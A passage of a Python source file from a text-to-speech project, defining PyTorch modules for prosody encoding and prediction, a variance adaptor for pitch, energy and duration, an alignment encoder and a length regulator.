self.d_k = model_config[\"transformer\"][\"encoder_hidden\"]\n ref_enc_gru_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_gru_size\"]\n ref_attention_dropout = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_attention_dropout\"]\n bottleneck_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_u\"]\n\n self.encoder = ReferenceEncoder(preprocess_config, model_config)\n self.encoder_prj = nn.Linear(ref_enc_gru_size, self.E // 2)\n self.stl = STL(preprocess_config, model_config)\n self.encoder_bottleneck = nn.Linear(self.E, bottleneck_size)\n self.dropout = nn.Dropout(ref_attention_dropout)\n\n def forward(self, mels, mel_mask):\n '''\n mels --- [N, Ty/r, n_mels*r], r=1\n out --- [N, seq_len, E]\n '''\n _, embedded_prosody = self.encoder(mels, mel_mask)\n\n # Bottleneck\n embedded_prosody = self.encoder_prj(embedded_prosody)\n\n # Style Token\n out = self.encoder_bottleneck(self.stl(embedded_prosody))\n out = self.dropout(out)\n\n return out\n\n\nclass ParallelProsodyPredictor(nn.Module):\n \"\"\" Parallel Prosody Predictor \"\"\"\n\n def __init__(self, model_config, phoneme_level=True):\n super(ParallelProsodyPredictor, self).__init__()\n\n self.phoneme_level = phoneme_level\n self.E = model_config[\"transformer\"][\"encoder_hidden\"]\n self.input_size = self.E\n self.filter_size = self.E\n self.conv_output_size = self.E\n self.kernel = model_config[\"prosody_modeling\"][\"liu2021\"][\"predictor_kernel_size\"]\n self.dropout = model_config[\"prosody_modeling\"][\"liu2021\"][\"predictor_dropout\"]\n bottleneck_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_p\"] if phoneme_level else\\\n model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_u\"]\n\n self.conv_layer = nn.Sequential(\n OrderedDict(\n [\n (\n \"conv1d_1\",\n ConvNorm(\n self.input_size,\n self.filter_size,\n kernel_size=self.kernel,\n stride=1,\n padding=(self.kernel - 1) // 2,\n dilation=1,\n transpose=True,\n ),\n ),\n (\"relu_1\", nn.ReLU()),\n (\"layer_norm_1\", nn.LayerNorm(self.filter_size)),\n (\"dropout_1\", nn.Dropout(self.dropout)),\n (\n \"conv1d_2\",\n ConvNorm(\n self.filter_size,\n self.filter_size,\n kernel_size=self.kernel,\n stride=1,\n padding=1,\n dilation=1,\n transpose=True,\n ),\n ),\n (\"relu_2\", nn.ReLU()),\n (\"layer_norm_2\", nn.LayerNorm(self.filter_size)),\n (\"dropout_2\", nn.Dropout(self.dropout)),\n ]\n )\n )\n self.gru = nn.GRU(input_size=self.E,\n hidden_size=self.E//2,\n batch_first=True,\n bidirectional=True,)\n self.predictor_bottleneck = nn.Linear(self.E, bottleneck_size)\n\n def forward(self, x):\n \"\"\"\n x --- [N, src_len, hidden]\n \"\"\"\n x = self.conv_layer(x)\n\n self.gru.flatten_parameters()\n memory, out = self.gru(x)\n\n if self.phoneme_level:\n pv_forward = memory[:, :, :self.E//2]\n pv_backward = memory[:, :, self.E//2:]\n prosody_vector = torch.cat((pv_forward, pv_backward), dim=-1)\n else:\n out = out.transpose(0, 1)\n prosody_vector = torch.cat((out[:, 0], out[:, 1]), dim=-1).unsqueeze(1)\n prosody_vector = self.predictor_bottleneck(prosody_vector)\n\n return prosody_vector\n\n\nclass NonParallelProsodyPredictor(nn.Module):\n \"\"\" Non-parallel Prosody Predictor inspired by Du et al., 2021 \"\"\"\n\n def __init__(self, model_config, phoneme_level=True):\n super(NonParallelProsodyPredictor, self).__init__()\n\n self.phoneme_level = phoneme_level\n # self.E = model_config[\"transformer\"][\"encoder_hidden\"]\n self.d_model = model_config[\"transformer\"][\"encoder_hidden\"]\n kernel_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"predictor_kernel_size\"]\n dropout = model_config[\"prosody_modeling\"][\"liu2021\"][\"predictor_dropout\"]\n bottleneck_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_p\"] if phoneme_level else\\\n model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_u\"]\n self.conv_stack = nn.ModuleList(\n [\n ConvBlock(\n in_channels=self.d_model,\n out_channels=self.d_model,\n kernel_size=kernel_size[i],\n dropout=dropout,\n normalization=nn.LayerNorm,\n transpose=True,\n )\n for i in range(2)\n ]\n )\n self.gru_cell = nn.GRUCell(\n self.d_model + 2 * self.d_model,\n 2 * self.d_model,\n )\n self.predictor_bottleneck = nn.Linear(2 * self.d_model, bottleneck_size)\n\n def init_state(self, x):\n \"\"\"\n x -- [B, src_len, d_model]\n p_0 -- [B, 2 * d_model]\n self.gru_hidden -- [B, 2 * d_model]\n \"\"\"\n B, _, d_model = x.shape\n p_0 = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n self.gru_hidden = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n return p_0\n\n def forward(self, h_text, mask=None):\n \"\"\"\n h_text -- [B, src_len, d_model]\n mask -- [B, src_len]\n outputs -- [B, src_len, 2 * d_model]\n \"\"\"\n x = h_text\n for conv_layer in self.conv_stack:\n x = conv_layer(x, mask=mask)\n\n # Autoregressive Prediction\n p_0 = self.init_state(x)\n\n outputs = [p_0]\n for i in range(x.shape[1]):\n p_input = torch.cat((x[:, i], outputs[-1]), dim=-1) # [B, 3 * d_model]\n self.gru_hidden = self.gru_cell(p_input, self.gru_hidden) # [B, 2 * d_model]\n outputs.append(self.gru_hidden)\n outputs = torch.stack(outputs[1:], dim=1) # [B, src_len, 2 * d_model]\n\n if mask is not None:\n outputs = outputs.masked_fill(mask, 0.0)\n\n if self.phoneme_level:\n prosody_vector = outputs # [B, src_len, 2 * d_model]\n else:\n prosody_vector = torch.mean(outputs, dim=1, keepdim=True) # [B, 1, 2 * d_model]\n prosody_vector = self.predictor_bottleneck(prosody_vector)\n\n return prosody_vector\n\n\nclass VarianceAdaptor(nn.Module):\n \"\"\" Variance Adaptor \"\"\"\n\n def __init__(self, preprocess_config, model_config, train_config, d_model):\n super(VarianceAdaptor, self).__init__()\n self.preprocess_config = preprocess_config\n self.learn_alignment = model_config[\"duration_modeling\"][\"learn_alignment\"]\n self.binarization_start_steps = train_config[\"duration\"][\"binarization_start_steps\"]\n\n self.use_pitch_embed = model_config[\"variance_embedding\"][\"use_pitch_embed\"]\n self.use_energy_embed = model_config[\"variance_embedding\"][\"use_energy_embed\"]\n self.predictor_grad = model_config[\"variance_predictor\"][\"predictor_grad\"]\n\n self.hidden_size = model_config[\"transformer\"][\"encoder_hidden\"]\n self.filter_size = model_config[\"variance_predictor\"][\"filter_size\"]\n self.predictor_layers = model_config[\"variance_predictor\"][\"predictor_layers\"]\n self.dropout = model_config[\"variance_predictor\"][\"dropout\"]\n self.ffn_padding = model_config[\"variance_predictor\"][\"ffn_padding\"]\n self.kernel = model_config[\"variance_predictor\"][\"predictor_kernel\"]\n self.duration_predictor = DurationPredictor(\n self.hidden_size,\n n_chans=self.filter_size,\n n_layers=model_config[\"variance_predictor\"][\"dur_predictor_layers\"],\n dropout_rate=self.dropout, padding=self.ffn_padding,\n kernel_size=model_config[\"variance_predictor\"][\"dur_predictor_kernel\"],\n dur_loss=train_config[\"loss\"][\"dur_loss\"])\n self.length_regulator = LengthRegulator()\n\n if self.use_pitch_embed:\n n_bins = model_config[\"variance_embedding\"][\"pitch_n_bins\"]\n self.pitch_type = preprocess_config[\"preprocessing\"][\"pitch\"][\"pitch_type\"]\n self.use_uv = preprocess_config[\"preprocessing\"][\"pitch\"][\"use_uv\"]\n\n if self.pitch_type == \"cwt\":\n self.cwt_std_scale = model_config[\"variance_predictor\"][\"cwt_std_scale\"]\n h = model_config[\"variance_predictor\"][\"cwt_hidden_size\"]\n cwt_out_dims = 10\n if self.use_uv:\n cwt_out_dims = cwt_out_dims + 1\n self.cwt_predictor = nn.Sequential(\n nn.Linear(self.hidden_size, h),\n PitchPredictor(\n h,\n n_chans=self.filter_size,\n n_layers=self.predictor_layers,\n dropout_rate=self.dropout, odim=cwt_out_dims,\n padding=self.ffn_padding, kernel_size=self.kernel))\n self.cwt_stats_layers = nn.Sequential(\n nn.Linear(self.hidden_size, h), nn.ReLU(),\n nn.Linear(h, h), nn.ReLU(), nn.Linear(h, 2)\n )\n else:\n self.pitch_predictor = PitchPredictor(\n self.hidden_size,\n n_chans=self.filter_size,\n n_layers=self.predictor_layers,\n dropout_rate=self.dropout,\n odim=2 if self.pitch_type == \"frame\" else 1,\n padding=self.ffn_padding, kernel_size=self.kernel)\n self.pitch_embed = Embedding(n_bins, self.hidden_size, padding_idx=0)\n\n if self.use_energy_embed:\n dataset_tag = \"unsup\" if self.learn_alignment else \"sup\"\n energy_level_tag, self.energy_feature_level = \\\n get_variance_level(preprocess_config, model_config)\n assert self.energy_feature_level in [\"phoneme_level\", \"frame_level\"]\n energy_quantization = model_config[\"variance_embedding\"][\"energy_quantization\"]\n assert energy_quantization in [\"linear\", \"log\"]\n n_bins = model_config[\"variance_embedding\"][\"energy_n_bins\"]\n with open(\n os.path.join(preprocess_config[\"path\"][\"preprocessed_path\"], \"stats.json\")\n ) as f:\n stats = json.load(f)\n energy_min, energy_max = stats[f\"energy_{dataset_tag}_{energy_level_tag}\"][:2]\n\n self.energy_predictor = EnergyPredictor(\n self.hidden_size,\n n_chans=self.filter_size,\n n_layers=self.predictor_layers,\n dropout_rate=self.dropout, odim=1,\n padding=self.ffn_padding, kernel_size=self.kernel)\n if energy_quantization == \"log\":\n self.energy_bins = nn.Parameter(\n torch.exp(\n torch.linspace(np.log(energy_min), np.log(energy_max), n_bins - 1)\n ),\n requires_grad=False,\n )\n else:\n self.energy_bins = nn.Parameter(\n torch.linspace(energy_min, energy_max, n_bins - 1),\n requires_grad=False,\n )\n self.energy_embedding = Embedding(n_bins, self.hidden_size, padding_idx=0)\n\n if model_config[\"duration_modeling\"][\"learn_alignment\"]:\n self.aligner = AlignmentEncoder(\n n_mel_channels=preprocess_config[\"preprocessing\"][\"mel\"][\"n_mel_channels\"],\n n_att_channels=preprocess_config[\"preprocessing\"][\"mel\"][\"n_mel_channels\"],\n n_text_channels=d_model,\n temperature=model_config[\"duration_modeling\"][\"aligner_temperature\"],\n multi_speaker=model_config[\"multi_speaker\"],\n )\n\n self.model_type = model_config[\"prosody_modeling\"][\"model_type\"]\n if self.model_type == \"du2021\":\n assert not self.learn_alignment\n self.prosody_extractor = ProsodyExtractor(\n n_mel_channels=preprocess_config[\"preprocessing\"][\"mel\"][\"n_mel_channels\"],\n d_model=d_model,\n kernel_size=model_config[\"prosody_modeling\"][\"du2021\"][\"extractor_kernel_size\"],\n )\n self.prosody_predictor = ProsodyPredictor(\n d_model=d_model,\n kernel_size=model_config[\"prosody_modeling\"][\"du2021\"][\"predictor_kernel_size\"],\n num_gaussians=model_config[\"prosody_modeling\"][\"du2021\"][\"predictor_num_gaussians\"],\n dropout=model_config[\"prosody_modeling\"][\"du2021\"][\"predictor_dropout\"],\n )\n self.prosody_linear = LinearNorm(2 * d_model, d_model)\n elif self.model_type == \"liu2021\":\n self.utterance_prosody_encoder = UtteranceLevelProsodyEncoder(\n preprocess_config, model_config)\n self.phoneme_prosody_encoder = PhonemeLevelProsodyEncoder(\n preprocess_config, model_config)\n # self.utterance_prosody_predictor = NonParallelProsodyPredictor(\n # model_config, phoneme_level=False)\n # self.phoneme_prosody_predictor = NonParallelProsodyPredictor(\n # model_config, phoneme_level=True)\n self.utterance_prosody_predictor = ParallelProsodyPredictor(\n model_config, phoneme_level=False)\n self.phoneme_prosody_predictor = ParallelProsodyPredictor(\n model_config, phoneme_level=True)\n self.utterance_prosody_prj = nn.Linear(\n model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_u\"], model_config[\"transformer\"][\"encoder_hidden\"])\n self.phoneme_prosody_prj = nn.Linear(\n model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_p\"], model_config[\"transformer\"][\"encoder_hidden\"])\n\n def binarize_attention_parallel(self, attn, in_lens, out_lens):\n \"\"\"For training purposes only. Binarizes attention with MAS.\n These will no longer recieve a gradient.\n Args:\n attn: B x 1 x max_mel_len x max_text_len\n \"\"\"\n with torch.no_grad():\n attn_cpu = attn.data.cpu().numpy()\n attn_out = b_mas(attn_cpu, in_lens.cpu().numpy(), out_lens.cpu().numpy(), width=1)\n return torch.from_numpy(attn_out).to(attn.device)\n\n def get_phoneme_level_pitch(self, phone, src_len, mel2ph, mel_len, pitch_frame):\n return torch.from_numpy(\n pad_1D(\n [get_phoneme_level_pitch(ph[:s_len], m2ph[:m_len], var[:m_len]) for ph, s_len, m2ph, m_len, var \\\n in zip(phone.int().cpu().numpy(), src_len.cpu().numpy(), mel2ph.cpu().numpy(), mel_len.cpu().numpy(), pitch_frame.cpu().numpy())]\n )\n ).float().to(pitch_frame.device)\n\n def get_phoneme_level_energy(self, duration, src_len, energy_frame):\n return torch.from_numpy(\n pad_1D(\n [get_phoneme_level_energy(dur[:len], var) for dur, len, var \\\n in zip(duration.int().cpu().numpy(), src_len.cpu().numpy(), energy_frame.cpu().numpy())]\n )\n ).float().to(energy_frame.device)\n\n def get_pitch_embedding(self, decoder_inp, f0, uv, mel2ph, control, encoder_out=None):\n pitch_pred = f0_denorm = cwt = f0_mean = f0_std = None\n if self.pitch_type == \"ph\":\n pitch_pred_inp = encoder_out.detach() + self.predictor_grad * (encoder_out - encoder_out.detach())\n pitch_padding = encoder_out.sum().abs() == 0\n pitch_pred = self.pitch_predictor(pitch_pred_inp) * control\n if f0 is None:\n f0 = pitch_pred[:, :, 0]\n f0_denorm = denorm_f0(f0, None, self.preprocess_config[\"preprocessing\"][\"pitch\"], pitch_padding=pitch_padding)\n pitch = f0_to_coarse(f0_denorm) # start from 0 [B, T_txt]\n pitch = F.pad(pitch, [1, 0])\n pitch = torch.gather(pitch, 1, mel2ph) # [B, T_mel]\n pitch_embed = self.pitch_embed(pitch)\n else:\n decoder_inp = decoder_inp.detach() + self.predictor_grad * (decoder_inp - decoder_inp.detach())\n pitch_padding = mel2ph == 0\n\n if self.pitch_type == \"cwt\":\n pitch_padding = None\n cwt = cwt_out = self.cwt_predictor(decoder_inp) * control\n stats_out = self.cwt_stats_layers(encoder_out[:, 0, :]) # [B, 2]\n mean = f0_mean = stats_out[:, 0]\n std = f0_std = stats_out[:, 1]\n cwt_spec = cwt_out[:, :, :10]\n if f0 is None:\n std = std * self.cwt_std_scale\n f0 = cwt2f0_norm(\n cwt_spec, mean, std, mel2ph, self.preprocess_config[\"preprocessing\"][\"pitch\"],\n )\n if self.use_uv:\n assert cwt_out.shape[-1] == 11\n uv = cwt_out[:, :, -1] > 0\n elif self.preprocess_config[\"preprocessing\"][\"pitch\"][\"pitch_ar\"]:\n pitch_pred = self.pitch_predictor(decoder_inp, f0 if self.training else None) * control\n if f0 is None:\n f0 = pitch_pred[:, :, 0]\n else:\n pitch_pred = self.pitch_predictor(decoder_inp) * control\n if f0 is None:\n f0 = pitch_pred[:, :, 0]\n if self.use_uv and uv is None:\n uv = pitch_pred[:, :, 1] > 0\n\n f0_denorm = denorm_f0(f0, uv, self.preprocess_config[\"preprocessing\"][\"pitch\"], pitch_padding=pitch_padding)\n if pitch_padding is not None:\n f0[pitch_padding] = 0\n\n pitch = f0_to_coarse(f0_denorm) # start from 0\n pitch_embed = self.pitch_embed(pitch)\n\n pitch_pred = {\n \"pitch_pred\": pitch_pred,\n \"f0_denorm\": f0_denorm,\n \"cwt\": cwt,\n \"f0_mean\": f0_mean,\n \"f0_std\": f0_std,\n }\n\n return pitch_pred, pitch_embed\n\n def get_energy_embedding(self, x, target, mask, control):\n x.detach() + self.predictor_grad * (x - x.detach())\n prediction = self.energy_predictor(x, squeeze=True)\n if target is not None:\n embedding = self.energy_embedding(torch.bucketize(target, self.energy_bins))\n else:\n prediction = prediction * control\n embedding = self.energy_embedding(\n torch.bucketize(prediction, self.energy_bins)\n )\n return prediction, embedding\n\n def forward(\n self,\n speaker_embedding,\n text,\n text_embedding,\n src_len,\n src_mask,\n mel,\n mel_len,\n mel_mask=None,\n max_len=None,\n pitch_target=None,\n energy_target=None,\n duration_target=None,\n attn_prior=None,\n p_control=1.0,\n e_control=1.0,\n d_control=1.0,\n step=None,\n ):\n pitch_prediction = energy_prediction = prosody_info = None\n\n x = text.clone()\n if speaker_embedding is not None:\n x = x + speaker_embedding.unsqueeze(1).expand(\n -1, text.shape[1], -1\n )\n\n # GMM-MDN for Phone-Level Prosody Modeling (Du et al., 2021)\n if self.model_type == \"du2021\" and not self.learn_alignment:\n w, sigma, mu = self.prosody_predictor(text, src_mask)\n\n if self.training:\n prosody_embeddings = self.prosody_extractor(mel, mel_len, duration_target, src_len)\n else:\n prosody_embeddings = self.prosody_predictor.sample(w, sigma, mu)\n x = x + self.prosody_linear(prosody_embeddings)\n prosody_info = (w, sigma, mu, prosody_embeddings)\n\n # Implicit Prosody Modeling (Liu et al., 2021)\n elif self.model_type == \"liu2021\":\n utterance_prosody_embeddings = phoneme_prosody_embeddings = phoneme_prosody_attn = None\n utterance_prosody_vectors = phoneme_prosody_vectors = None\n if self.training:\n utterance_prosody_embeddings = self.utterance_prosody_encoder(mel, mel_mask)\n phoneme_prosody_embeddings, phoneme_prosody_attn = self.phoneme_prosody_encoder(x, src_len, src_mask, mel, mel_len, mel_mask)\n\n # x = x + self.utterance_prosody_prj(utterance_prosody_embeddings) # always using prosody extractor (no predictor)\n # x = x + self.phoneme_prosody_prj(phoneme_prosody_embeddings) # always using prosody extractor (no predictor)\n utterance_prosody_vectors = self.utterance_prosody_predictor(x)\n x = x + (self.utterance_prosody_prj(utterance_prosody_embeddings) if self.training else\n self.utterance_prosody_prj(utterance_prosody_vectors))\n phoneme_prosody_vectors = self.phoneme_prosody_predictor(x)\n x = x + (self.phoneme_prosody_prj(phoneme_prosody_embeddings) if self.training else\n self.phoneme_prosody_prj(phoneme_prosody_vectors))\n prosody_info = (\n utterance_prosody_embeddings,\n phoneme_prosody_embeddings,\n utterance_prosody_vectors,\n phoneme_prosody_vectors,\n phoneme_prosody_attn,\n )\n\n log_duration_prediction = self.duration_predictor(\n x.detach() + self.predictor_grad * (x - x.detach()), src_mask\n )\n\n # Trainig of unsupervised duration modeling\n attn_soft, attn_hard, attn_hard_dur, attn_logprob = None, None, None, None\n if attn_prior is not None:\n assert self.learn_alignment and duration_target is None and mel is not None\n attn_soft, attn_logprob = self.aligner(\n mel.transpose(1, 2),\n text_embedding.transpose(1, 2),\n src_mask.unsqueeze(-1),\n attn_prior.transpose(1, 2),\n speaker_embedding,\n )\n attn_hard = self.binarize_attention_parallel(attn_soft, src_len, mel_len)\n attn_hard_dur = attn_hard.sum(2)[:, 0, :]\n attn_out = (attn_soft, attn_hard, attn_hard_dur, attn_logprob)\n\n # Upsampling from src length to mel length\n x_org = x.clone()\n if attn_prior is not None: # Trainig of unsupervised duration modeling\n if step < self.binarization_start_steps:\n A_soft = attn_soft.squeeze(1)\n x = torch.bmm(A_soft,x)\n else:\n x, mel_len = self.length_regulator(x, attn_hard_dur, max_len)\n duration_rounded = attn_hard_dur\n pitch_target[\"mel2ph\"] = dur_to_mel2ph(duration_rounded, src_mask)[:, : max_len]\n elif duration_target is not None: # Trainig of supervised duration modeling\n assert not self.learn_alignment and attn_prior is None\n x, mel_len = self.length_regulator(x, duration_target, max_len)\n duration_rounded = duration_target\n else: # Inference\n assert attn_prior is None and duration_target is None\n duration_rounded = torch.clamp(\n (torch.round(torch.exp(log_duration_prediction) - 1) * d_control),\n min=0,\n )\n x, mel_len = self.length_regulator(x, duration_rounded, max_len)\n mel_mask = get_mask_from_lengths(mel_len)\n mel2ph = dur_to_mel2ph(duration_rounded, src_mask)\n\n # Note that there is no pre-extracted phoneme-level variance features in unsupervised duration modeling.\n # Alternatively, we can use attn_hard_dur instead of duration_target for computing phoneme-level variances.\n x_temp = x.clone()\n if self.use_pitch_embed:\n if pitch_target is not None:\n mel2ph = pitch_target[\"mel2ph\"]\n if self.pitch_type == \"cwt\":\n cwt_spec = pitch_target[f\"cwt_spec\"]\n f0_mean = pitch_target[\"f0_mean\"]\n f0_std = pitch_target[\"f0_std\"]\n pitch_target[\"f0\"] = cwt2f0_norm(\n cwt_spec, f0_mean, f0_std, mel2ph, self.preprocess_config[\"preprocessing\"][\"pitch\"],\n )\n pitch_target.update({\"f0_cwt\": pitch_target[\"f0\"]})\n if self.pitch_type == \"ph\":\n pitch_target[\"f0\"] = self.get_phoneme_level_pitch(text, src_len, mel2ph, mel_len, pitch_target[\"f0\"])\n pitch_prediction, pitch_embedding = self.get_pitch_embedding(\n x, pitch_target[\"f0\"], pitch_target[\"uv\"], mel2ph, p_control, encoder_out=x_org\n )\n else:\n pitch_prediction, pitch_embedding = self.get_pitch_embedding(\n x, None, None, mel2ph, p_control, encoder_out=x_org\n )\n x_temp = x_temp + pitch_embedding\n if self.use_energy_embed and self.energy_feature_level == \"frame_level\":\n energy_prediction, energy_embedding = self.get_energy_embedding(x, energy_target, mel_mask, e_control)\n x_temp = x_temp + energy_embedding\n elif self.use_energy_embed and self.energy_feature_level == \"phoneme_level\":\n if attn_prior is not None:\n energy_target = self.get_phoneme_level_energy(attn_hard_dur, src_len, energy_target)\n energy_prediction, energy_embedding = self.get_energy_embedding(x_org, energy_target, src_mask, e_control)\n x_temp = x_temp + self.length_regulator(energy_embedding, duration_rounded, max_len)[0]\n x = x_temp.clone()\n\n return (\n x,\n pitch_target,\n pitch_prediction,\n energy_target,\n energy_prediction,\n log_duration_prediction,\n duration_rounded,\n mel_len,\n mel_mask,\n attn_out,\n prosody_info,\n )\n\n\nclass AlignmentEncoder(torch.nn.Module):\n \"\"\" Alignment Encoder for Unsupervised Duration Modeling \"\"\"\n\n def __init__(self, \n n_mel_channels,\n n_att_channels,\n n_text_channels,\n temperature,\n multi_speaker):\n super().__init__()\n self.temperature = temperature\n self.softmax = torch.nn.Softmax(dim=3)\n self.log_softmax = torch.nn.LogSoftmax(dim=3)\n\n self.key_proj = nn.Sequential(\n ConvNorm(\n n_text_channels,\n n_text_channels * 2,\n kernel_size=3,\n bias=True,\n w_init_gain='relu'\n ),\n torch.nn.ReLU(),\n ConvNorm(\n n_text_channels * 2,\n n_att_channels,\n kernel_size=1,\n bias=True,\n ),\n )\n\n self.query_proj = nn.Sequential(\n ConvNorm(\n n_mel_channels,\n n_mel_channels * 2,\n kernel_size=3,\n bias=True,\n w_init_gain='relu',\n ),\n torch.nn.ReLU(),\n ConvNorm(\n n_mel_channels * 2,\n n_mel_channels,\n kernel_size=1,\n bias=True,\n ),\n torch.nn.ReLU(),\n ConvNorm(\n n_mel_channels,\n n_att_channels,\n kernel_size=1,\n bias=True,\n ),\n )\n\n if multi_speaker:\n self.key_spk_proj = LinearNorm(n_text_channels, n_text_channels)\n self.query_spk_proj = LinearNorm(n_text_channels, n_mel_channels)\n\n def forward(self, queries, keys, mask=None, attn_prior=None, speaker_embed=None):\n \"\"\"Forward pass of the aligner encoder.\n Args:\n queries (torch.tensor): B x C x T1 tensor (probably going to be mel data).\n keys (torch.tensor): B x C2 x T2 tensor (text data).\n mask (torch.tensor): uint8 binary mask for variable length entries (should be in the T2 domain).\n attn_prior (torch.tensor): prior for attention matrix.\n speaker_embed (torch.tensor): B x C tnesor of speaker embedding for multi-speaker scheme.\n Output:\n attn (torch.tensor): B x 1 x T1 x T2 attention mask. Final dim T2 should sum to 1.\n attn_logprob (torch.tensor): B x 1 x T1 x T2 log-prob attention mask.\n \"\"\"\n if speaker_embed is not None:\n keys = keys + self.key_spk_proj(speaker_embed.unsqueeze(1).expand(\n -1, keys.shape[-1], -1\n )).transpose(1, 2)\n queries = queries + self.query_spk_proj(speaker_embed.unsqueeze(1).expand(\n -1, queries.shape[-1], -1\n )).transpose(1, 2)\n keys_enc = self.key_proj(keys) # B x n_attn_dims x T2\n queries_enc = self.query_proj(queries)\n\n # Simplistic Gaussian Isotopic Attention\n attn = (queries_enc[:, :, :, None] - keys_enc[:, :, None]) ** 2 # B x n_attn_dims x T1 x T2\n attn = -self.temperature * attn.sum(1, keepdim=True)\n\n if attn_prior is not None:\n #print(f\"AlignmentEncoder \\t| mel: {queries.shape} phone: {keys.shape} mask: {mask.shape} attn: {attn.shape} attn_prior: {attn_prior.shape}\")\n attn = self.log_softmax(attn) + torch.log(attn_prior[:, None] + 1e-8)\n #print(f\"AlignmentEncoder \\t| After prior sum attn: {attn.shape}\")\n\n attn_logprob = attn.clone()\n\n if mask is not None:\n attn.data.masked_fill_(mask.permute(0, 2, 1).unsqueeze(2), -float(\"inf\"))\n\n attn = self.softmax(attn) # softmax along T2\n return attn, attn_logprob\n\n\nclass LengthRegulator(nn.Module):\n \"\"\" Length Regulator \"\"\"\n\n def __init__(self):\n super(LengthRegulator, self).__init__()\n\n def LR(self, x, duration, max_len):\n output = list()\n mel_len = list()\n for batch, expand_target in zip(x, duration):\n expanded = self.expand(batch, expand_target)\n output.append(expanded)\n mel_len.append(expanded.shape[0])\n\n if max_len is not None:\n output = pad(output, max_len)\n else:\n output = pad(output)\n\n return output, torch.LongTensor(mel_len).to(x.device)\n\n def expand(self, batch, predicted):\n out = list()\n\n for i, vec in enumerate(batch):\n expand_size = predicted[i].item()\n out.append(vec.expand(max(int(expand_size), 0), -1))\n out = torch.cat(out, 0)\n\n return out\n\n def forward(self, x, duration, max_len):\n output, mel_len = self.LR(x, duration, max_len)\n return output, mel_len\n\n\nclass DurationPredictor(torch.nn.Module):\n \"\"\"Duration predictor module.\n This is a module of duration predictor described in `FastSpeech: Fast, Robust and Controllable Text to Speech`_.\n The duration predictor predicts a duration of each frame in log domain from the hidden embeddings of encoder.\n .. _`FastSpeech: Fast, Robust and Controllable Text to Speech`:\n https://arxiv.org/pdf/1905.09263.pdf\n Note:\n The outputs are calculated in log domain.\n \"\"\"\n\n def __init__(self, idim, n_layers=2, n_chans=384, kernel_size=3, dropout_rate=0.1, offset=1.0, padding=\"SAME\", dur_loss=\"mse\"):\n \"\"\"Initilize duration predictor module.\n Args:\n idim (int): Input dimension.\n n_layers (int, optional): Number of convolutional layers.\n n_chans (int, optional): Number of channels of convolutional layers.\n kernel_size (int, optional): Kernel size of convolutional layers.\n dropout_rate (float, optional): Dropout rate.\n offset (float, optional): Offset value to avoid nan in log domain.\n \"\"\"\n super(DurationPredictor, self).__init__()\n self.offset = offset\n self.conv = torch.nn.ModuleList()\n self.kernel_size = kernel_size\n self.padding = padding\n self.dur_loss = dur_loss\n for idx in range(n_layers):\n in_chans = idim if idx == 0 else n_chans\n self.conv += [torch.nn.Sequential(\n torch.nn.ConstantPad1d(((kernel_size - 1) // 2, (kernel_size - 1) // 2)\n if padding == \"SAME\"\n else (kernel_size - 1, 0), 0),\n torch.nn.Conv1d(in_chans, n_chans, kernel_size, stride=1, padding=0),\n torch.nn.ReLU(),\n LayerNorm(n_chans, dim=1),\n torch.nn.Dropout(dropout_rate)\n )]\n if self.dur_loss in [\"mse\", \"huber\"]:\n odims = 1\n elif self.dur_loss == \"mog\":\n odims = 15\n elif self.dur_loss == \"crf\":\n odims = 32\n from torchcrf import CRF\n self.crf = CRF(odims, batch_first=True)\n self.linear = torch.nn.Linear(n_chans, odims)\n\n def forward(self, xs, x_masks=None):\n xs = xs.transpose(1, -1) # (B, idim, Tmax)\n for f in self.conv:\n xs = f(xs) # (B, C, Tmax)\n if x_masks is not None:\n xs = xs * (1 - x_masks.float())[:, None, :]\n\n xs = self.linear(xs.transpose(1, -1)) # [B, T, C]\n xs = xs * (1 - x_masks.float())[:, :, None] # (B, T, C)\n if self.dur_loss in [\"mse\"]:\n xs = xs.squeeze(-1) # (B, Tmax)\n return xs\n\n\nclass PitchPredictor(torch.nn.Module):\n def __init__(self, idim, n_layers=5, n_chans=384, odim=2, kernel_size=5,\n dropout_rate=0.1, padding=\"SAME\"):\n \"\"\"Initilize pitch predictor module.\n Args:\n idim (int): Input dimension.\n n_layers (int, optional): Number of convolutional layers.\n n_chans (int, optional): Number of channels of convolutional layers.\n kernel_size (int, optional): Kernel size of convolutional layers.\n dropout_rate (float, optional): Dropout rate.\n \"\"\"\n super(PitchPredictor, self).__init__()\n self.conv = torch.nn.ModuleList()\n self.kernel_size = kernel_size\n self.padding = padding\n for idx in range(n_layers):\n in_chans = idim if idx == 0 else n_chans\n self.conv += [torch.nn.Sequential(\n torch.nn.ConstantPad1d(((kernel_size - 1) // 2, (kernel_size - 1) // 2)\n if padding == \"SAME\"\n else (kernel_size - 1, 0), 0),\n torch.nn.Conv1d(in_chans, n_chans, kernel_size, stride=1, padding=0),\n torch.nn.ReLU(),\n LayerNorm(n_chans, dim=1),\n torch.nn.Dropout(dropout_rate)\n )]\n self.linear = torch.nn.Linear(n_chans, odim)\n self.embed_positions = SinusoidalPositionalEmbedding(idim, 0, init_size=4096)\n self.pos_embed_alpha = nn.Parameter(torch.Tensor([1]))\n\n def forward(self, xs, squeeze=False):\n \"\"\"\n\n :param xs: [B, T, H]\n :return: [B, T, H]\n \"\"\"\n positions = self.pos_embed_alpha * self.embed_positions(xs[..., 0])\n xs = xs + positions\n xs = xs.transpose(1, -1) # (B, idim, Tmax)\n for f in self.conv:\n xs = f(xs) # (B, C, Tmax)\n # NOTE: calculate in log domain\n xs = self.linear(xs.transpose(1, -1)) # (B, Tmax, H)\n return xs.squeeze(-1) if squeeze else xs\n\n\nclass EnergyPredictor(PitchPredictor):\n pass\n","repo_name":"keonlee9420/Comprehensive-Transformer-TTS","sub_path":"model/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":55595,"program_lang":"python","lang":"en","doc_type":"code","stars":292,"dataset":"github-code","pt":"42"} +{"seq_id":"5449074842","text":"###\n### 